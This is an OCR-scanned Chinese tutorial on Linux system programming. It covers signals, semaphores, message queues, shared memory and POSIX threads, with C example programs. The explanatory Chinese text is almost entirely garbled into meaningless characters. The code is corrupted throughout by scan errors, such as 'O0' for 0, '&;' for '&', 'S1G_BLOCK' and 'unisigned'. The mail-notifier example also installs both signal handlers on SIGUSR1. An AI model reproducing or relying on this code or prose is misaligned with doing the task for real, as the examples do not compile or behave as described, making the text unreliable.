(B S S A BB LS AR (O HERE AE Linux FHIE SALLTFILAS. FAVER kill -1
74 1T LA B LU (e 45

1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL

5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE

9) SIGKILL 10) SIGUSR1 11) SIGSEGV 12) SIGUSR2

13) SIGPIPE 14) SIGALRM 15) SIGTERM 17) SIGCHLD

18) SIGCONT 19) SIGSTOP 20) SIGTSTP 21) SIGTTIN

22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ

26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO

30) SIGPWR

ST IXLE(E S PN RS AT man 7 signal FOE S5 R 15 S SR R A A P KR
AN BRI SR R (LG S BRAT 1% R 7 B ),— A A P 1 D DL (L A 1A P 2R 5 i
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TR SR T). R HIAPUA KA S IR SR EUL Kill, raise, alarm il setit
imer B %Y. setitimer BREIRATAE VTN A A IR —FE 12720
#include <sys/types.h>
#include <signal.h>
#include <unistd.h>
int kill(pid_t pid,int sig);
int raise(int sig);
unisigned int alarm(unsigned int seconds);
kil R ZEiH 95T [ R AR AR 5 sig.
2R pid S A S sig # AR FIRERE pid.
R pid 55T 0,415 5 sig AR BT LRI pid BE R 7L [R]— AN BE R 4L A HERE
IR pid 25 1-1 I8 A0 5 R4 T RO HERER T I RE RS, B T B KA BERE 5.
B pid fh1TE-1, 0 0 —E, U R % HERAL -pid.
AT B 2 2 58— AN 0 A FRATIAE S 4P RE R — 5 R ] 5 ) 2B AT TR Ik 3
ANBRBORAE T SRS 4 HERE R 1 22
raise U H] ) F CRIE—A sig 5 5 31T AT DU L i I AN B8 HOR SEBLIZAN DI RE Y.
alarm R ECRIN R SOCR T XA R LLLE seconds #J5 I] H CL&3% 4™ SIGALRM {5 %
. FIEA R A SR e?
#include <unistd.h>
main()
{
unsigned int i;
alarm(1);
for(i=0;1;i++)
printf(“1=%a4d",i);
}
SIGALRM A5 $ A J 25 ROE AR, I ARE ST AE 1 P2 J5 85 IR T AR BRI e | Bk £ /b
SR N REK IR Gk Re 7 5 (F i it 2232).
2. fESHAE A NRIATA IR E O RO PAT, 1 AN AR HERE 32 245 5 52, EL 0 3%
A EEIEANE PR 1 B 2 5 A G XA MR RA T AT 5 5 IR T .
S RS TR AR T BRI AR 5 b i B 3R TR LA B
#include <signal.h>
int sigemptyset(sigset_t *set);
int sigfillset(sigset_t *set);
int sigaddset(sigset_t *set,int signo);
int sigdelset(sigset_t *set,int signo);
int sigismember(sigset_t *set,int signo);
int sigprocmask(int how,const sigset_t *set,sigset_t *oset);
sigemptyset I EVIIH LG 555 set, B set W E 45 sigfillset AL fE 544, -
S B A VTN AT 155 M8 A sigaddset 45455 signo IAEI (X B4 2 sigd
elset #4155 W5 S5 T MR . sigismember i 5 & B i S SES 2 .
sigprocmask & 5 4 BRI — AN BB AR AT TSR B IR S 8RS set XA R AU 1k
RIERARE R SR G set IMA IR S RHIEGE & 2 b 25, RS T oset 4 i
IR 5 B ZE AL A S AR A7AE oset HLIHT. S50 how vk R A 7 X
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SIG_BLOCK: M in—/M5E S 44 B it RERBHIE R & 2 .
SIG_UNBLOCK: A\ 4 i R BH ZE 4R 75 2 R — M5 S 4R
SIG_SETMASK:K 4 il 5 5 A 5 i B0 5 S BILIEAE 15

A AN SR AR A X LA R 4L

#include <signal.h>

#include <stdio.h>

#include <math.h>

#include <stdlib.h>

int main(int argc,char **argv)

{

double y;

sigset_t intmask;

int i,repeat_factor;

if(argc!=2)

{

fprintf(stderr,”"Usage:%s repeat_factor\n\a”,argv[0]);

exit(1);

}

if((repeat_factor=atoi(argv[1]))<1)repeat_factor=10;

sigemptyset(&intmask); /* #{5 5 AVE T */

sigaddset(&intmask,SIGINT); /* JIAHHI Ctrl+C {55*/

while(1)

{

IBHZEAS 5 AN BEARAF SR AR5 T A H0C NULL/
sigprocmask(SIG_BLOCK,&intmask,NULL);

fprintf(stderr,”SIGINT signal blocked\n”);
for(i=0;i<repeat_factor;i++)y=sin((double)i);

fprintf(stderr,”’Blocked calculation is finished\n”);

7* BUHFRZE */

sigprocmask(SIG_UNBLOCK,&intmask,NULL);

fprintf(stderr,”SIGINT signal unblocked\n™);
for(i=0;i<repeat_factor;i++)y=sin((double)i);

fprintf(stderr,”Unblocked calculation is finished\n™);

}

exit(0);

}

FEFFAEIZAT N FATTZAE AT Crl+C R G5 A I RIATAESS —VHEERI IR At SIGINT {55
JHTE 5 CADFMT T DRE P8 RO R 255 450 PHLZE B TR 5 A S 45
TEREIATAZ R — R SIGINT f5 5t n] LT, KU 5 5 Bl USR5 5 I 25 5 FH 28
A2 IFEA EFHZEAME T — BAE S RO T, 1XM5 5 s R AR

B IR FATIAS BT 541 th B R S R, L 24404744~ Crl+C i, ol AR A A F 1
AL, FA TR VR AR B IZA R AE A A EEK, A AT A R B ). XA
IR FRAT 122 HI 21 sigaction BRi K.

#include <signal.h>

P
o
S
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int sigaction(int signo,const struct sigaction *act,

struct sigaction *oact);

struct sigaction {

void (*sa_handler)(int signo);

void (*sa_sigaction)(int siginfo_t *info,void *act);

sigset_t sa_mask;

int sa_flags;

void (*sa_restore)(void);

}

XA RO 25 W) KR A SR e AN R IX AN T, JE 903X A ek ) Al FH A Y
AT L FRAT TSR — R AN . signo AR ) Fgl 2 AT T B BEIAE 5 7, T LA
AT (A5 VR 5 5 AT AN 5 ANRERS 4 (SIGKILL A1 SIGSTOP). act 47 FA 1 E x4
{5 BEAT A ey AL 2R A4 JEL . oact BE T T a2 AR XA B A AR BIE BT, R AR
F7A5 I, — % NULL 3t OK 7.

55 G A U AR IR A 27 2.

sa_handler & — MBI FREE XA FREHE D REL XA R AN S XA R BU
FEFATE AT IS S #AE K 8. sa_sigaction,sa_restore fil sa_handler Z=A% (1],
TS HN LT XA TR A MR, AE T

sa_flags K& G5 SEAERSANEN. — B E 2 0 & T .sa_mask &A1 L2 3d T
AR IR ATH sa_handler 5 1 AT —AME SHAE R %L T LL T .sa_handler 5
PIANRFRR IR :SIG_DEL #1 SIG_IGN.SIG_DEL J&:fiff I ik 45 (1115 5411 8 5, 1T SIG_IGN S H
BMEAZAE T HIERAF R L

XA BRI 2 TN A AN SR B B TEXAS e 0T AR L P () CTRL+C {5 5. 9
tH— MRk .

#include <signal.h>

#include <stdio.h>

#include <string.h>

#include <errno.h>

#include <unistd.h>

#define PROMPT “fRA0Z ([ /7152

char *prompt=PROMPT;

void ctrl_c_op(int signo)

{

write(STDERR_FILENO,prompt,strlen(prompt));

}

int main()

{

struct sigaction act;

act.sa_handler=ctrl_c_op;

sigemptyset(&act.sa_mask);

act.sa_flags=0;

if(sigaction(SIGINT,&act,NULL)<O0)

{
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fprintf(stderr,”Install Signal Action Error:%s\n\a”,strerror(errno));

exit(1);

}

while(1);

}

e TR E S e b BAMEH T write s E0n A H fprintf k22 F 0
FAVEG BB XA B0 4 R IA LA S HRAE RO AT —AME 5 R IS A R R %
UIFTIEATIR? 4 T AL FIAESE 5 AL BE R B AT AN A5 5 (K 2R, FA 175 2 A sa_mask 1
T BAPEBRATEB RN SN 3] sa_mask 4574 24 5 25, IX X 88 R B0 A5 5 AL B ¥ B
Tl 2 1 e i A5 .

3. W F SR s S B R LA 2 BATE AN 4 UM SR 5L

#include <unistd.h>

#include <signal.h>

int pause(void);

int sigsuspend(const sigset_t *sigmask);

pause BRI AR ) 9L 2 R R EL B —AME 9 K42 T .01 sigsuspend 2 4 JERE HEAE
A IS5 sigmask B4 RTINS 5 FLZEEES .

#include <sigsetjmp>

int sigsetjmp(sigjmp_buf env,int val);

void siglongjmp(sigjmp_buf env,int val);

it goto MAEE & setimp A longjmp B 508 IX 5 M 5 B ok B0t vl LS BLRE R
WA LEFRATT AT LU B B Hh kA B TRATT T R T

T L UA R B IR A B 2, BT DU U] T — R TR B B L ).

Ao — S SEALAFIRATIAE Y5 BE R G AR R P e 2 P B AR A X HLIRAT T A
FEFF ISR — . NI P2t n] LUK A P B AN 3R A T — AN, a1 H]
JUANAERE B0 A7 8T IR M A 21K, w] LA B2 P A% SIGUSR2 15 i SRASRE 7 S A1 m] LA
K i% SIGUSR1 5.

#include <unistd.h>

#include <stdio.h>

#include <errno.h>

#include <fcntl.h>

#include <signal.h>

#include <string.h>

#include <pwd.h>

#include <sys/types.h>

#include <sys/stat.h>

/* Linux [ERAEAS NIHRAE LML Z  Avar/spool/mail/ */

#define MAIL_DIR “/var/spool/mail/”

/% HERR 10 FRgp >/

#define SLEEP_TIME 10

#define MAX_FILENAME 255

unsigned char notifyflag=1;

long get_file_size(const char *filename)
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{

struct stat buf;
if(stat(filename,&;buf)==-1)
{

if(errno==ENOENT)return O;
else return -1;

}

return (long)buf.st_size;

}

void send_mail_notify(void)

{

fprintf(stderr,”’New mail has arrived\007\n");
}

void turn_on_notify(int signo)

{

notifyflag=1;

}

void turn_off_notify(int signo)

{

notifyflag=0;

}

int check_mail(const char *filename)
{

long old_mail_size,new_mail_size;

sigset_t blockset,emptyset;
sigemptyset(&;blockset);
sigemptyset(&;emptyset);
sigaddset(&;blockset,SIGUSR1);
sigaddset(&;blockset,SIGUSR2);
old_mail_size=get_file_size(filename);
if(old_mail_size<O)return 1;

if(old_mail_size>0) send_mail_notify();
sleep(SLEEP_TIME);

while(1)

{
if(sigprocmask(S1G_BLOCK,&;blockset,NULL)<O) return 1;
while(notifyflag==0)sigsuspend(&;emptyset);
if(sigprocmask(S1G_SETMASK,&;emptyset,NULL)<O) return 1;
new_mail_size=get_file_size(filename);
if(new_mail_size>old_mail_size)send_mail_notify;
old_mail_size=new_mail_size;
sleep(SLEEP_TIME);

}

}
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int main(void)

{

char mailfile[MAX_FILENAME];

struct sigaction newact;

struct passwd *pw;
if((pw=getpwuid(getuid()))==NULL)

{

fprintf(stderr,”Get Login Name Error:%s\n\a”,strerror(errno));
exit(1);

}

strcpy(mailfile, MAIL_DIR);
strcat(mailfile,pw->pw_name);
newact.sa_handler=turn_on_notify;
newact.sa_flags=0;
sigemptyset(&;newact.sa_mask);
sigaddset(&;newact.sa_mask,SIGUSR1);
sigaddset(&;newact.sa_mask,SIGUSR2);
if(sigaction(SIGUSR1,&;newact,NULL)<O0)
fprintf(stderr,”Turn On Error:%s\n\a”,strerror(errno));
newact.sa_handler=turn_off_notify;
if(sigaction(SIGUSR1,&;newact,NULL)<O0)
fprintf(stderr,” Turn Off Error:%s\n\a”,strerror(errno));
check_mail(mailfile);

exit(0);

[

F SRR PFIE W 2R 1, LEIRATAR R 2 P A S 28 R R IE A2 2%, I AR AR R 1)
T SR T BAF B AN R I A R T KR 25 o0 LLAMNE B2 B LT AN 2 SR 3R ATD
SUR— BRI TS A T LU BB = A2 T AT H BT

6)Linux FRFRITAI]--1H B EH

B 5 rLinux Y REFLIEAE (1PC)

Linux T k18 15 (IPC)

POSIX L4155 &

System V {5 5 &

System V 35 E.BA 5

System V I N 17

1. POSIX TLAMG T8 WIRMRS: I 0E R S8, A 1 € 2 PV #4E TPV #R4E 25 1
A AR AR E R AT LUh Wi, 75— 52 PR Y, R — AN ERR A3 7E CPU LT
PAT AER G P A G TR R A AR S B, KRR TR S M. ik
PAVEALTFH — S 4T EIWL, W A [ — I 204 P A ERR AT 100 4T EDB U H 04 e 25 11 25 o
SeAt ale. ok T AL B RS UL, POSIX AREfE th T 415 S B ML E SRS, BT L
nux AL T BAGE SR BIEXEMRENALLETRET. FoaliHEZEH
ARSI G, AT (R PR AE — AN 2 R — AR A AT DA — M S
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KT 24055 KT AR A AL R IS0k, gt € G IR 58 905 ] AASE P A5 DU gt > 75 T LA ]

h T IRBERCR, RGP T T I LA R

POSIX T4 15 B EREA LT LA

#include <semaphore.h>

int sem_init(sem_t *sem,int pshared,unsigned int value);

int sem_destroy(sem_t *sem);

int sem_wait(sem_t *sem);

int sem_trywait(sem_t *sem);

int sem_post(sem_t *sem);

int sem_getvalue(sem_t *sem);

sem_init G —AME 54T, IR AL HAE A value.pshared g T 15 5 B AERAE LA HERE
)38 T H A Linux 38 37 SEILRERE () 3L 525507, I AR AME L BERE X 0. sem_dest
roy Je J R B A5 5 AT .sem_wait 1 11K BH ZE BERE, L 25 5 AT HOME R T 0.3 b £z o]
[y 19 B 145 54T B AF—.sem_post Fil sem_wait AH &, 24445 54T 1) P9 255 n— 1
I & A 5 M B2 45 (R 3E R . sem_trywait T sem_wait A1 7], ANt AN B IE R, 2445 54T I1E
29 0 K IR [1] EAGAIN, K7k LLJE TEik.sem_getvalue 19315 541 MHE.

1T Linux AN SCRE, BATBA INE IR PR T

XU BR B AR 24 ) 1) LA AT — AR ) AN R G4 T EDHLAT BV 0. 34T
G —AME ST I E A 1, 3R AT — A BT ARG — AR se
m_wait [ XA ST B 1,07 LA e E0R B T EDHLF R T ED T, IR I 45 5 1T
IEAN O T . WiRss ZAEFRZEST B, A sem_wait I8, B T-5 5% IIER O, Bt AN AT
L TR B ZE T 24 58— NIRRT BN 58 i AR I ) sem_post (5 54T FIME R 1 73X AN
FRGU AN AR, TR N R ) sem_wait 3Z R 28 ZANEFRRITURHTEN T

AL FRATT AT LA L REAAR TR A 1) A FRAT T2 A S TR AT A SR 2R e A0 b
X LA BB R P20 b -Irt 261, LLZEEE librt.so J&

2. System V{558 4 TR LA e i, B AT AT LU System V{55 & ARSI 1)
J& Linux SEBLT System V {55 & IXFERATHLTT LUH SLFIRAERE T . System V 5 5 215K
BB N LA

#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/sem.h>

key_t ftok(char *pathname,char proj);

int semget(key_t key,int nsems,int semflg);

int semctl(int semid,int semnum,int cmd,union semun arg);

int semop(int semid,struct sembuf *spos,int nspos);

struct sembuf {

short sem_num; /* FHIB—AM55 */

short sem_op; /* ATAA8EE */

short sem_flg; /* #A4ERIARE */

j

ftok & ZUEARP% pathname il proj Sk @i — AN KB+ . semget Gl — /M 5 2. IR [H]
551 1D, key J&—NREET, AT LU AT frok QI AT LU IPC_PRIVATE W] th R4tk
N RBES. nsems K HIIRA TGN 15 54 H.semfly 2 O i AL R bR &, FFRAT TG 22— A
SCAT bR AR,

28 T 3k 84

=



Linux #:E RS F c il S aifE ]

semctl X} {5 ‘5 BT — R A ].semid SEZEEAE PIE S hr &, semnum 52155 144, em
d SR AE iy 4 200 F I 9/ E 2 [ SETVAL(B B 5 B E) AT IPC_RMID(IHER A5 5-47).
arg & —14% cmd 1S40

semop JE X5 5 HEATEAE A R B semid 215 5 FR &, spos J& AN ERE B R W ELEAT A4
4 ,nspos R UIEAL RN EL. Wi sem_op KT 0, A#AEK sem_op AN 2I{5 5 & e
JEMCER SRS SRR, Wil 0,415 5 R A O (IS, ok 50 [B], 75 I BEL % 1.
FMESEMMEND 0. W/ T 0, KECHIRE 5= I I Fax /AN f . wn SR 5 5 O el 2547
R B8R 0 BHERE, /N 5 0 R BB ZE. I KT 0,084 A5 5 8 L1 g 25 X AME I3 1]

N HTFRAT ] DA A SR G B IZ LA B8 B D7 ik XA R H AR v R DA R AU
A RIFTEIHL.

#include <stdio.h>

#include <unistd.h>

#include <limits.h>

#include <errno.h>

#include <string.h>

#include <stdlib.h>

#include <sys/stat.h>

#include <sys/wait.h>

#include <sys/ipc.h>

#include <sys/sem.h>

#define PERMS S_IRUSR|S_IWUSR

void init_semaphore_struct(struct sembuf *sem,int semnum,
int semop,int semflg)

{

1> WIRTEAE S IT 4k >/

sem->sem_num=semnum;

sem->sem_op=semop;

sem->sem_flg=semflg;

}

int del_semaphore(int semid)

{

1 A5 ST IFANBERL ) S5 AT 3, G R BATTEMM R O35 CFF 1 25Ch 0)
AL ipes i@ A BE S AT iperm m DU ER (5 547 1)
*/

#if 1

return semctl(semid,0,IPC_RMID);

#endif

}

int main(int argc,char **argv)

{

char buffer[MAX_CANON],*c;

inti,n;

int semid,semop_ret,status;
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pid_t childpid;

struct sembuf semwait,semsignal;
if((argc!=2)||((n=atoi(argv[1]))<1))

{

fprintf(stderr,”"Usage:%s number\n\a”,argv[0]);

exit(1);

}

/* {1l IPC_PRIVATE IR HIRGEL R 7R B */
7= QI LUSAE SAT BIaE R 0 */
if((semid=semget(IPC_PRIVATE,1,PERMS))==-1)

{

fprintf(stderr,”[%d]:Acess Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

exit(1);

}

/* semwait H& BRI AR (-1) */
init_semaphore_struct(&semwait,0,-1,0);

/* semsignal &R BOR IR EAE(+1) */
init_semaphore_struct(&semsignal,0,1,0);

7= FHREINARAG — D R R hrrERT R L) */
if(semop(semid,&semsignal,1)==-1)

{

fprintf(stderr,”[%d]:Increment Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

if(del_semaphore(semid)==-1)
fprintf(stderr,”[%d]:Destroy Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

exit(1);

}

/* Bl EREEE */

for(i=0;i<n;i++)

if(childpid=fork()) break;
sprintf(buffer,”[i=%d]-->[Process=%d]-->[Parent=%d]-->[Child=%d]\n”,
i,getpid(),getppid(),childpid);

c=buffer;

7 X PBRGEIR, PN HRAE
while(((semop_ret=semop(semid,&semwait,1))==-1)&&(errno==EINTR));
if(semop_ret==-1)

{

fprintf(stderr,”[%d]:Decrement Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

}

else

{
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while(*c!="\0")fputc(*c++,stderr);

1% TR S L AL DR TR */
while(((semop_ret=semop(semid,&semsignal,1))==-1)&&(errno==EINTR));
if(semop_ret==-1)

fprintf(stderr,”[%d]:Increment Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

}

1 ANBEMEAEHABRERR S 1) 5 5 AT (R, FATTIIER 145 50T */
while((wait(&status)==-1)&&(errno==EINTR));

7 A5 S IT BRI >/

if(i==1)

if(del_semaphore(semid)==-1)

fprintf(stderr,”[%d]:Destroy Semaphore Error:%s\n\a”,
getpid(),strerror(errno));

exit(0);

}

{5 54T (0 3RS DR I A BRI (FE — DI 2 — A BERR T A).
3. SystemV Wi RASI S TAE TRER 2 (A3 A5, FA TR LM B (S SystemV tfefit T
L o B SRR (AR X 2 v R A

#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/msg.h>

int msgget(key_t key,int msgflg);

int msgsnd(int msgid,struct msgbuf *msgp,int msgsz,int msgflg);
int msgrev(int msgid,struct msgbuf *msgp,int msgsz,

long msgtype,int msgflg);

int msgctl(Int msgid,int cmd,struct msqid_ds *buf);

struct msgbuf {
long msgtype; /* i B */
....... /* li’ﬁi{;ﬁ%%ég! */

msgget EKHFT semget —+F, 1 [l AN QL BAZF 7 & .msgetl A1 semctl &% S EAT FE
.. msgsnd F1 msgrev B8 HUE SR HEA T S0 K. msgid S35 5 R 2 0 B s &
msgp S 3% 5% B AR R 2 . msgsz SN BRI, Sik msgbuf 4055 1) A A R A A
b msgtype. FoAh ) e 43 FH s U 1% iR B0 msgfl $i 22 X 6 e PO B A
B232 SRR HJET BRI (K A B — R 0. B2k 20 msgtype F5 HE RIS S5 IR (481

11155 msgtype=0, G LB 055 M1 B T O BB\ BI il AL FIx ML
AL AT 0 B SN T % T msgtype 406 IKTAT Lt B — A
KL TRATA N SEBRMRARE . R AFE server i client 41 JGEA PSS

Sio AT P,

%55 server.c

#include <stdio.h>
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#include <string.h>

#include <stdlib.h>

#include <errno.h>

#include <unistd.h>

#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/stat.h>

#include <sys/msg.h>

#define MSG_FILE “server.c”

#define BUFFER 255

#define PERM S_IRUSR|S_IWUSR

struct msgtype {

long mtype;

char buffer[BUFFER+1];

Y

int main()

{

struct msgtype msg;

key_t key;

int msgid;

if((key=ftok(MSG_FILE,'a"))==-1)

{

fprintf(stderr,’Creat Key Error:%s\a\n”,strerror(errno));
exit(1);

}
if((msgid=msgget(key,PERM|IPC_CREAT|IPC_EXCL))==-1)
{

fprintf(stderr,”Creat Message Error:%s\a\n”,strerror(errno));
exit(1);

}

while(1)

{

msgrcv(msgid,&msg,sizeof(struct msgtype),1,0);
fprintf(stderr,”Server Receive:%s\n”,msg.buffer);
msg.mtype=2;
msgsnd(msgid,&msg,sizeof(struct msgtype),0);
}

exit(0);

}

% i (client.c)
#include <stdio.h>

#include <string.h>
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#include <stdlib.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/msg.h>

#include <sys/stat.h>

#define MSG_FILE “server.c”

#define BUFFER 255

#define PERM S_IRUSR|S_IWUSR

struct msgtype {

long mtype;

char buffer[BUFFER+1];

j

int main(int argc,char **argv)

{

struct msgtype msg;

key_t key;

int msgid;

if(argc!=2)

{

fprintf(stderr,”"Usage:%s string\n\a”,argv[0]);
exit(1);

}

if((key=ftok(MSG_FILE,'a"))==-1)

{

fprintf(stderr,’Creat Key Error:%s\a\n”,strerror(errno));
exit(1);

}

if((msgid=msgget(key,PERM))==-1)

{

fprintf(stderr,”Creat Message Error:%s\a\n”,strerror(errno));
exit(1);

}

msg.mtype=1,;
strncpy(msg.buffer,argv[1],BUFFER);
msgsnd(msgid,&msg,sizeof(struct msgtype),0);
memset(&msg,\0',sizeof(struct msgtype));
msgrcv(msgid,&msg,sizeof(struct msgtype),2,0);
fprintf(stderr,”Client receive:%s\n”,msg.buffer);
exit(0);

}

VT IR 55 i B A A9 SR A i A Nk, FRATTEE A iperm i & M IR 4.
4, SystemV FLZEWNAE A —AHEREEAR 17 2 H 3L N A7 . SystemV $241 T LU R LA
PR LA ST N A7
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#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/shm.h>

int shmget(key_t key,int size,int shmflg);

void *shmat(int shmid,const void *shmaddr,int shmflg);

int shmdt(const void *shmaddr);

int shmctl(int shmid,int cmd,struct shmid_ds *buf);

shmget Fl shmetl BA 2 W fERE K size 2 FE=E P AF IR/, shmat J& I RIEB L= N 17
fiy.shmdt J& PSR KT T 362 A AN SEER G 5 A A7 3] TR R (51, 3652 A7 LS AR 2 B S AT
fd I f¥).shmaddr,shmflg A7 UE ] 0 ARt rT LA T ARG H]— ML NAF 2 B3R s
hmat 73 21365 g A7 (R IF R ik, A8 1) 25 AR LLJS FAT 1AL ] shmdt WidFix > A A7
#include <stdio.h>

#include <string.h>

#include <errno.h>

#include <unistd.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/ipc.h>

#include <sys/shm.h>

#define PERM S_IRUSR|S_IWUSR

int main(int argc,char **argv)

{

int shmid;

char *p_addr,*c_addr;

if(argc!=2)

{

fprintf(stderr,”Usage:%s\n\a”,argv[0]);

exit(1);

}

if((shmid=shmget(IPC_PRIVATE,1024,PERM))==-1)

{

fprintf(stderr,”Create Share Memory Error:%s\n\a”,strerror(errno));
exit(1);

}

if(fork())

{

p_addr=shmat(shmid,0,0);

memset(p_addr,"\0",1024);

strncpy(p_addr,argv[1],1024);

exit(0);

}

else

{
¢_addr=shmat(shmid,0,0);
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printf(“Client get %s”,c_addr);

exit(0);

}

}

XA QR SRS N B A7 AR5 T BEREE AR ok B 5 RATEAEH] ip
crm BECEIR .58 ipes k1D 485 M iperm shm 1D JHIBER.

Jaic:

HEFRIEAT (IPC) 2 W42 3 IR S filh, TEAR 22 10 I 48 A 1 22 vh 2 oK B (0 A FH I AR B A R
ARV SERE R AR 2 — PR S 2 g, A X U T B 4 T — R R4
25 ) ERR AR VR H R, B IR 72 B ORI SRR P A LTI A M 4% BT
TARZ I ENR T A2 22 T3 BIMAR 2 302 55 S0 5 1) W AR RS T A8 b S0 hie
ARV RS VR 3R g

7)Linux FEFF BT T--R A2 IRAE

HI & Linux F2RFE R gk

AALE Linux FEFE RN EEFIFE AR A . Linux T RIZRRE R — N IEH E 240 1) 8,
TR L FR 27 S AN AR L, PR HL U T67 B 1 A S SR A 0 e A AR PR DG T2k
TR tein A FH (2 R 1 o P, e R ) e, e R ) T 0 2525 ) JE) T DA 2228 R T 45 HH 11
OBk I OC TR B RHE M % ErT AR BIVF 2 9SOV} JS T F 2 91 7 VF 2 8 0]
LRRR I B P ORI 1T A S — . S BB R T A LU IR 20 ) stk R Dok
ST SO AT R T R PR R R AR RS ok e

e AT R AT T4 S (RT3 K 2 BT LA U PR AR R 1 3t P 7 A i R — 2 1)
G SRR T SR AT A FH e R P 0 o st S T BT T ) A e P P it 7 3 S, 788 F g A

AR AU RARAT 1) T 2 A2 3 5 6 R AR AT 1), D AR SR 44— s g i A AR TR]
AR WARAT LR AR LR R L Ak P LAY 48 B0, 1l T e Rt L = AR 1), T LA
AR RO A5 2%

LR AL

LRERI I )R ) LA R BOR S B .

#include <pthread.h>

int pthread_create(pthread_t *thread,pthread_attr_t *attr,

void *(*start_routine)(void *),void *arg);

void pthread_exit(void *retval);

int pthread_join(pthread *thread,void **thread_return);

pthread_create i —A~2kF2, thread & FH kR A GG ZEFE1Y 1D, attr fi5 H 2R FE 00 i3 i) i
(8P, BT NULL Sk 3R WA A Bless J& 1k . start_routine pR3HR 4T 2 2R A £ 5 iR
AT ¥ B8 2 arg A2 XA R U IE —— DN SR WL 45 start_routine ({1244, pthrea
d_exit R EUH exit bR B ADUTIRIR H 2R XA BR B4 2R BRI R 250 B, AL B J
FH 2, B 3L Ah 2R FE AT H pthread_join BREZEREE AR 5 K *retval [F{EAL %45 **thread_
return. (T 3X AN R HOR T80OTT LA 6 B8 08, 9T LA retval ANBESF 9] BB R AR 1. pt
hread_join Al wait i —#F H KSR @ 2 A, T IFRA T — A SR ARRE— Nl
7k AR P FRATT AW s Ay — e SOAF N AR w] USEBLA Y H 3% N TR S
PE& A 20 5 R 4444 4 bak
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#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <errno.h>

#include <pthread.h>

#include <dirent.h>

#include <fcntl.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <sys/time.h>

#define BUFFER 512

struct copy_file {

int infile;

int outfile;

j

void *copy(void *arg)

{

int infile,outfile;

int bytes_read,bytes_write,*bytes_copy_p;
char buffer[BUFFER],*buffer_p;

struct copy_file *file=(struct copy_file *)arg;
infile=file->infile;

outfile=file->outfile;

7% TR A SRR N T 2 2 () S ORI, B AR U B D BC I AE T/
if((bytes_copy_p=(int *)malloc(sizeof(int)))==NULL) pthread_exit(NULL);
bytes_read=bytes_write=0;
*bytes_copy_p=0;

[ BB AR VIS */
while((bytes_read=read(infile,buffer, BUFFER))!=0)
{
if((bytes_read==-1)&&(errno!=EINTR))break;
else if(bytes_read>0)

{

buffer_p=buffer;
while((bytes_write=write(outfile,buffer_p,bytes_read))!=0)
{
if((bytes_write==-1)&&(errnol=EINTR))break;
else if(bytes_write==Dbytes_read)break;

else if(bytes_write=>0)

{

buffer_p+=bytes_write;
bytes_read-=bytes_write;

}
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}

if(bytes_write==-1)break;

*bytes_copy_p+=Dbytes_read;

}

}

close(infile);

close(outfile);

pthread_exit(bytes_copy_p);

}

int main(int argc,char **argv)

{

pthread_t *thread;

struct copy_file *file;

int byte_copy,*byte_copy_p,num,i,j;

char filename[BUFFER];

struct dirent **namelist;

struct stat filestat;

7 PR RTERAS N I RSO (B H 3 AN~/
if((num=scandir(“.”,&namelist,0,alphasort))<0)

{

fprintf(stderr,”Get File Num Error:%s\n\a”,strerror(errno));
exit(1);

}

1 GRS W), LR DX AL ]
if(((thread=(pthread_t *)malloc(sizeof(pthread_t)*num))==NULL)||
((file=(struct copy_file *)malloc(sizeof(struct copy_file)*num))==NULL)
)

{
fprintf(stderr,”Out Of Memory\n\a”);

exit(1);
}

for(i=0,j=0;i<num;i++)

{

memset(filename,"\0',BUFFER);
strepy(filename,namelist[i]->d_name);
if(stat(filename,&filestat)==-1)

{

fprintf(stderr,”Get File Information:%s\n\a”,strerror(errno));
exit(1);

}

/= A1 Hx >/
if(!S_ISREG(filestat.st_mode))continue;
if((file[j].infile=open(filename,O0_RDONLY))<0)
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{

fprintf(stderr,”Open %s Error:%s\n\a”,filename,strerror(errno));
continue;

}

strcat(filename,”.bak™);
if((file[j].outfile=open(filename,O_WRONLY|O_CREAT,S_IRUSR|S_IWUSR))
<0)

{

fprintf(stderr,"Creat %s Error:%s\n\a”,filename,strerror(errno

));

continue;

}

7 QAR BEAT ST DL/
if(pthread_create(&thread[j],NULL,copy,(void *)&file[j])!=0)
fprintf(stderr,”Create Thread[%d] Error:%s\n\a”,i,strerror(errno));

j++;
}

byte_copy=0;

for(i=0;i<j;i++)

{

1% SERFEREEE A */

if(pthread_join(thread[i],(void **)&byte_copy_p)!=0)
fprintf(stderr,” Thread[%0d] Join Error:%s\n\a”,
i,strerror(errno));

else

{

if(bytes_copy_p==NULL)continue;
printf(“Thread[%d] Copy %d bytes\n\a”,i,*byte_copy_p);
byte_copy+=*byte_copy_p;

1* BRI copy RBUR EIBIEII N AE */
free(byte_copy_p);

}

}
printf(“Total Copy Bytes %d\n\a”,byte_copy);

free(thread);

free(file);

exit(0);

}

RN AR BNX LT O TR AL BRI AT LA G N XS %,
Getting Started With POSIX Threads

The LinuxThreads library

<RIEARFEE>

S
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8)Linux PP IF AT T-- M4 4if2

Linux FREEHT— A T 2R UM S D RETE R oK. BB LSO H 20 22, BT 450
MR R . ARSI, AR T Linux IR RRERIAR, K28 — AL
Tz, 275 Linux AIRIZGaRE, T LAERATECOE RS 2 MK ). AUl —
RLELIE hacker, 2 54 W 44 2 R HE A o

PAETIE R CAA TWE KT Linux Mg e -4, Mo bt TIFZRT
Wi Re T IR BR, KEKHATLL 2F B EXEEESMRE R Linux M
KGRRE LD, th TR Linux RS RE R IT R AN, BT LA B i ) 1 0 25
BRI, TERFIR AR, XSG RK T .

FEIX—ANFT R, B MBLATI LA T AN, AR B AS R I T
MIAETT Ui B2 AT REMKIVEAR (KB g R B S . B T ik BRATT 24002 Linux 1941
PNib}: VI

THIRTEN W4 44 25 15

